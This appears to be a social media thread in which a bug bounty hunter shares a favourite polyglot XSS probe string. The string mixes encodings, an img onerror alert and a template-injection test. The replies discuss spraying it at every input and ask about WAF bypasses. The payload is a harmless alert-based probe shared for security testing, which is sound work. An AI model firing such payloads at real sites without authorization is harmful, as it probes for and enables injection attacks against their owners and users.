@bug_vs_me
Deepak bug_vs_me
7 months
\u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} My favourite xss payload
13
127
570

Replies

@0x2458
0x2458 🇮🇳
7 months
@bug_vs_me So you put it everywhere you can, or just use it at those places you think are vulnerable/or if you're trying a bypass of something? Thanks!
1
0
2
@bug_vs_me
Deepak bug_vs_me
7 months
@0x2458 i first blindly spray payload everywhere then check one by one if any bypass needed or any suspicious behaviour that leads to xss!
1
0
15
@arjunnotfrom
@Arjun_singh
7 months
@bug_vs_me Deepak kyun post Kiya bro , don't you think cloudfare aur akamai issay dekh leingay aur phir wahi mitigation !!!! . Hope I'm wrong
1
0
2
@bug_vs_me
Deepak bug_vs_me
7 months
@arjunnotfrom Nah its basic payload is already blocked by WAF!
2
0
1
@hackrzvijay
HackrzVijay 💻
7 months
@bug_vs_me do you know any cloudflare waf bypass payloads...?
2
0
0
@bug_vs_me
Deepak bug_vs_me
7 months
0
0
0
@Jayesh25_
Jayesh Madnani
7 months
@bug_vs_me @0xSh1v4 Nice share mate!
0
0
3
@TheTeaToast
Anindya Roy
7 months
@bug_vs_me This is really helpful. It has different encodings so we can know how different types of inputs are treated at once. Thanks 😁
0
0
3
@kleoz_
Kleoz
7 months
0
0
0
@Sazouki_
Sazouki 🇹🇳🚬
7 months
@bug_vs_me “><s>xss best thing lol
0
0
3
@aemaeth_2501
TM
7 months
@bug_vs_me Noice The law is the law
0
0
0
@l1ackoder
l14ck0der 🇯🇴 - Simplifying Life
7 months
@bug_vs_me For those who didn't get it. This is cross-site scripting (XSS) payload. It's crafted to exploit potential vulnerabilities in a website's security by injecting malicious code, which in this case could trigger an alert with the message "69"
0
0
0
@l1ackoder
l14ck0der 🇯🇴 - Simplifying Life
7 months
@bug_vs_me lets goooooo dude. I like it 🤜🤛
0
0
0